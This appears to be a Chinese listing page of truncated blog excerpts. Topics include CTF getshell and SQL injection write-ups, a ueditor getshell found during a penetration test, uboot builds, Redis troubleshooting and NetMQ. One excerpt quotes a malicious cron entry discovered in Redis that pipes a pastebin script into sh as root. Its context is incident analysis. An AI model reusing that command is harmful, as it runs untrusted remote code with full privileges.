案例链接： http://202.112.51.184:8007/ 打开链接，发现分了多个页面： 挨个点击，大概清楚是上传指定格式的文件然后在搜索的时候使文件执行从而GetShell，观察发现点击每个页面后出现“?page=xxx"字样，查看源代码发现还有隐藏的php ...

本文是i春秋论坛（https://bbs.ichunqiu.com/）的表哥为大家分享一个在实战过程中会经常遇到的SQL注入题目及解题思路，公众号旨在为大家提供更多的学习方法与技能技巧，文章仅供学习参考。 这是一个比较基础的题，在实战中经常会遇到。比如说前端利用 ...

前言： 本篇文章是关于一次渗透测试中意外getshell的记录，属于ueditor v1.3.x 的aspx语言的非网上流传的getshell方式。由于当时在网上搜索并未发现该种getshell方法，故分享给各位。 经过： 起因是针对某客户网站进行渗透测试时，发现了一个ueditor编辑器 ...

记一次uboot编译/经验/教训 - 最近学习uboot移植有关的知识，在了解原理后自己编译uboot，但是出现了好多各式各样的错误，最后换了几次系统环境之后才找到错误来源 1.准备源码与交叉编译工具链 环境：ubuntu19.04虚拟机 首先从linux公社下载 ...

日志集中式监控平台上线已经有一段时间，但是大部分情况下只是作为发布或者出问题时查看日志的便利工具使用。平时大家都不怎么主动上去看看。于是前几天把应用的错误日志也加上邮件、Hi和短信报警，马上就收到很多错误报警，引起了大家的重视。其中有一个Redis报错： 看起来挺严重的，拿不到Redis连接 ...

zabbix告警突然从某个时间点开始提示CPU使用高，网卡流量也一直居高不下。 首先查看redis日志，发现告警时间点redis主节点被重启了，发生了主备切换，并且在日志中发现这么一段 [3081] 06 Dec 02:33:28.090 # Client addr=****:35810 ...

起因 偶然间发现redis里有一个陌生key：tightsoft，它的值是：*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh 看key名就知道这肯定不是我们存的，再看value我警觉了，这是要定时执行脚本啊。 分析 ...

Redis是一个高速缓存K-V数据库，而NetMQ是ZeroMQ的C#实现版本，两者是完全不同的东西。 最近做游戏服务器的时候想到，如果选择一个组件来做服务器间通信的话，ZeroMQ绝对是一个不错的选择，而我们的服务器是用C#的开发的，就这样，找到了NetMQ。 NetMQ上手很简单。总结一下 ...